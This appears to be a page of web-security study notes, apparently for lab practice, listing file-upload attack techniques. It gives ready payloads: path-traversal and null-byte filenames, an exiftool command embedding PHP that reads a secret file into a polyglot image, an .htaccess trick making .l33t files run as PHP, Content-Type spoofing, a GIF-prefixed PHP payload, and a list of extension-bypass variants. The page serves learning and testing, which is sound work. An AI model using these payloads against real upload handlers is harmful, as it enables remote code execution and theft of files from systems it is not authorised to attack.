File Upload

  1. Upload the file name and include obfuscated path traversal ..%2fexploit.php and retrieve the content GET /files/avatars/..%2fexploit.php.

  2. Upload a file named, exploit.php%00.jpg with trailing null byte character and get the file execution at /files/avatars/exploit.php.

  3. Create polygot using valid image file, by running the command in bash terminal: exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ./stickman.png -o polyglot2023.php. Once polygot is uploaded, view the extracted data by issuing a GET request to the uploaded path /files/avatars/polyglot.php , and search the response content for the phrase START to obtain the sensitive data.

  4. Upload two different files. First upload .htaccess with Content-Type: text/plain, and the file data value set to AddType application/x-httpd-php .l33t. This will allow the upload and execute of second file upload named, exploit.l33t with extension l33t.

  5. MIME type image/jpeg or image/png is only allowed. Bypass the filter by specifying Content-Type to value of image/jpeg and then uploading exploit.php file.

  6. If target allow Remote File Include (RFI), upload from remote URL, then host and exploit file with the following GIF magic bytes: GIF89a; <?php echo file_get_contents('/home/carlos/secret'); ?>. The file name on exploit server could read image.php%00.gif.

  7. Double file extension bypass filter exploit.csv.php.

File extension bypass:

  1. Extension with varied capitalization, such as .sVG

  2. Double extension, such as .jpg.svg or .svg.jpg

  3. Extension with a delimiter, such as %0a, %09, %0d, %00, #. Other examples, file.png%00.svg or file.png\x0d\x0a.svg

  4. Empty filename, .svg

  5. Try to cut allowed extension with more than the maximum filename length.

XSS when svg upload

PreviousPath TraversalNextInsecure Desarialization

Last updated